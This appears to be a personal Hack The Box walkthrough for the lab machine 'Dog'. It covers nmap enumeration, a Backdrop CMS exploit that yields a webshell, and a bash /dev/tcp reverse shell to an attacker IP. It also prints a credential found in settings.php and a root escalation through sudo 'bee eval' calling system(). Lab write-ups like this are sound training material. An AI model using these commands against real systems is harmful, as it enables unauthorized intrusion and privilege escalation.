Dog

Easy - Linux

Enumeration

Ports

nmap -p- --open -sCV --top-ports 500 10.10.11.58
###
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Websites

Classsic Virtual Hosting dog.htb

Possible Usernames: dogBackDropSystem && Anonymous

CMS with name Backdrop

Is available the login addres -->

Hack the WebApp

User Enumeration

With it we can see, that the user dogBackDropSystem is available. Okay, we now search some inforamtion about exploits of Backdrop CMS 1.27.1

Exploit Database

Nice! sooo, now download it and execute the script -->

WebShell

NICE! Now, create a revershell and we put the netcat of lisener on any port -->

nc -nvlp 1234
##
bash -c 'bash -i >& /dev/tcp/10.10.14.246/1234 0>&1'

I do me TTI treatment -->
script /dev/null -c bash Ctrl+z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash stty rows 45 columns 184 ##dimensiones pantalla portatil

Into the web path we can see a archive with name settings.php, and inside it we can read a password:

First Climb

johncusack:BackDropJ2024DS2024

Now, i list the current user into this machine -->

And try to su in there are -->

Root Climb

With it, see the sudo permissions -->

We can see that this user will can bee of all permissions, so...

After investigate, i found a eval funtion with we can do a command execution -->

sudo /usr/local/bin/bee --root=/var/www/html eval 'system("cat /root/root.txt");'

PreviousMachines HTB NextCode

Last updated 6 months ago

hashtagEnumeration

hashtagPorts

hashtagWebsites

hashtagHack the WebApp

hashtagUser Enumeration

hashtagExploit Database

hashtagWebShell

hashtagFirst Climb

hashtagRoot Climb